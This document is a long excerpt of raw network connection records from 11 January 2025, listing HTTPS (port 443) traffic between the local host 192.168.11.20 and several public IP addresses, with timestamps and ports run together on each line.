                                                                                                                                                                  Jan 11, 2025 07:54:34.148263931 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.148276091 CET4436227968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.150831938 CET4436399935.208.249.213192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.150923014 CET4436399935.208.249.213192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.151057959 CET63999443192.168.11.2035.208.249.213
                                                                                                                                                                  Jan 11, 2025 07:54:34.164180994 CET63597443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.176069975 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.176388979 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.176419973 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.179152966 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.179446936 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.180253983 CET64557443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.180532932 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.180643082 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.180665970 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.180804014 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.196252108 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.198673010 CET4435418323.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.199022055 CET54183443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.199054003 CET4435418323.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.199664116 CET4435471023.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.199917078 CET54710443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.199954033 CET4435471023.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.202070951 CET4435418323.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.202280998 CET54183443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.202781916 CET4435471023.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.203000069 CET54710443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.203429937 CET54183443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.203481913 CET54710443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.203705072 CET4435418323.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.203773022 CET4435471023.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.218744993 CET63999443192.168.11.2035.208.249.213
                                                                                                                                                                  Jan 11, 2025 07:54:34.218784094 CET4436399935.208.249.213192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.227025032 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.227060080 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.233905077 CET4436227968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.234035015 CET4436227968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.234128952 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.234169006 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.237385035 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.237385035 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.237428904 CET4436227968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.237636089 CET62279443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.237832069 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.237886906 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.238069057 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.238297939 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.238342047 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.257956982 CET54183443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.257996082 CET4435418323.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.260020018 CET54710443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.260056973 CET4435471023.213.53.36192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.273869991 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.283633947 CET4435897035.213.89.133192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.283972025 CET58970443192.168.11.2035.213.89.133
                                                                                                                                                                  Jan 11, 2025 07:54:34.284008026 CET4435897035.213.89.133192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.286940098 CET4435897035.213.89.133192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.287144899 CET58970443192.168.11.2035.213.89.133
                                                                                                                                                                  Jan 11, 2025 07:54:34.288222075 CET58970443192.168.11.2035.213.89.133
                                                                                                                                                                  Jan 11, 2025 07:54:34.288352966 CET58970443192.168.11.2035.213.89.133
                                                                                                                                                                  Jan 11, 2025 07:54:34.288386106 CET4435897035.213.89.133192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.288506031 CET4435897035.213.89.133192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.291939020 CET4436329735.245.40.102192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.292057991 CET4436329735.245.40.102192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.292268038 CET63297443192.168.11.2035.245.40.102
                                                                                                                                                                  Jan 11, 2025 07:54:34.292481899 CET63297443192.168.11.2035.245.40.102
                                                                                                                                                                  Jan 11, 2025 07:54:34.292521000 CET4436329735.245.40.102192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.304810047 CET54183443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.305000067 CET54710443192.168.11.2023.213.53.36
                                                                                                                                                                  Jan 11, 2025 07:54:34.315917015 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.316061974 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.316323042 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.316932917 CET64995443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.316971064 CET4436499568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.317255020 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.317306995 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.317584038 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.317760944 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.317800999 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.331728935 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.331793070 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.332106113 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.332143068 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.332422972 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.332453012 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.332473040 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.332503080 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.332566977 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.332807064 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.332807064 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.332807064 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.332865953 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.333154917 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.335155964 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.335513115 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.335541010 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.335756063 CET58970443192.168.11.2035.213.89.133
                                                                                                                                                                  Jan 11, 2025 07:54:34.335797071 CET4435897035.213.89.133192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.336643934 CET44364557204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.336647034 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.336766958 CET44364557204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.336951017 CET64557443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.337013006 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.337186098 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.337270975 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.337311029 CET64557443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.337335110 CET44364557204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.343518972 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.343903065 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.343930006 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.345285892 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.345663071 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.345755100 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.345797062 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.345911980 CET44361086204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.346051931 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.346158981 CET61086443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.346193075 CET44361086204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.346349001 CET44353380204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.346713066 CET53380443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.346759081 CET44353380204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.349010944 CET44361086204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.349210978 CET61086443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.349674940 CET44353380204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.349915028 CET53380443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.350251913 CET61086443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.350509882 CET44361086204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.350775003 CET53380443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.351074934 CET44353380204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.351440907 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.351667881 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.351707935 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.351730108 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.381546974 CET4436038852.223.22.214192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.381673098 CET4436038852.223.22.214192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.381900072 CET60388443192.168.11.2052.223.22.214
                                                                                                                                                                  Jan 11, 2025 07:54:34.381999016 CET60388443192.168.11.2052.223.22.214
                                                                                                                                                                  Jan 11, 2025 07:54:34.382034063 CET4436038852.223.22.214192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.382457018 CET4436359720.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.382586956 CET4436359720.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.382730961 CET63597443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.382957935 CET63597443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.382957935 CET63597443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.382987976 CET4436359720.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.383099079 CET63597443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.383524895 CET64609443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.383579016 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.383600950 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.383663893 CET58970443192.168.11.2035.213.89.133
                                                                                                                                                                  Jan 11, 2025 07:54:34.383745909 CET64609443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.383867979 CET64609443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.383903027 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.398578882 CET53380443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.398580074 CET61086443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.398580074 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.398618937 CET44353380204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.398619890 CET44361086204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.398641109 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.445457935 CET53380443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.445470095 CET61086443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:54:34.450649977 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.450668097 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.450725079 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.450897932 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.450999975 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.450999975 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.451049089 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.451199055 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.451324940 CET44349210204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.451615095 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.451616049 CET49210443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.513246059 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.513633013 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.513664007 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.514575005 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.514996052 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.515038013 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.515058041 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.515234947 CET4436196468.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.569138050 CET61964443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.576888084 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.576946020 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.577161074 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.577197075 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.577390909 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.577518940 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.577531099 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.577733994 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.577768087 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.577785969 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.578022003 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.578263998 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.578296900 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.578483105 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.587985992 CET44359486172.241.51.69192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.588365078 CET59486443192.168.11.20172.241.51.69
                                                                                                                                                                  Jan 11, 2025 07:54:34.588388920 CET44359486172.241.51.69192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.590699911 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.590750933 CET44359486172.241.51.69192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.591012001 CET59486443192.168.11.20172.241.51.69
                                                                                                                                                                  Jan 11, 2025 07:54:34.591723919 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.591754913 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.592456102 CET59486443192.168.11.20172.241.51.69
                                                                                                                                                                  Jan 11, 2025 07:54:34.592551947 CET59486443192.168.11.20172.241.51.69
                                                                                                                                                                  Jan 11, 2025 07:54:34.592571020 CET44359486172.241.51.69192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.592710018 CET44359486172.241.51.69192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.592751026 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.593168020 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.593208075 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.593229055 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.593401909 CET4435967568.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611310959 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611335993 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611406088 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611496925 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611530066 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.611582994 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611676931 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.611710072 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.611804008 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.611886978 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.612080097 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.612328053 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.612636089 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.612823963 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.612828970 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.612875938 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.613039970 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.613075972 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.613094091 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.645922899 CET59486443192.168.11.20172.241.51.69
                                                                                                                                                                  Jan 11, 2025 07:54:34.645921946 CET59675443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:34.645948887 CET44359486172.241.51.69192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.660871029 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.687788010 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.688380003 CET64609443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.688419104 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.689357042 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.689862013 CET64609443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.690035105 CET64609443192.168.11.2020.33.55.12
                                                                                                                                                                  Jan 11, 2025 07:54:34.690068960 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.690108061 CET4436460920.33.55.12192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.691778898 CET59486443192.168.11.20172.241.51.69
                                                                                                                                                                  Jan 11, 2025 07:54:34.696623087 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.696955919 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.697247982 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.697283030 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.697729111 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.697818995 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.697830915 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.698013067 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.698082924 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.698285103 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.698306084 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.698782921 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.698956966 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.698985100 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.699014902 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.699119091 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.699342966 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.699363947 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.699547052 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.699867010 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.700064898 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.700064898 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.700164080 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.700181961 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.700639009 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.700795889 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.700814962 CET44352471204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.700898886 CET52471443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.729727030 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.729974031 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.730036974 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.730076075 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.731494904 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.731636047 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.731676102 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.731812954 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.731921911 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.732310057 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.732635021 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.732861996 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.732889891 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.732896090 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.732907057 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.733140945 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.733285904 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.733474016 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.733607054 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.733680010 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.733863115 CET64969443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:34.734019995 CET44364969204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.734117031 CET44352471204.79.197.203192.168.11.20
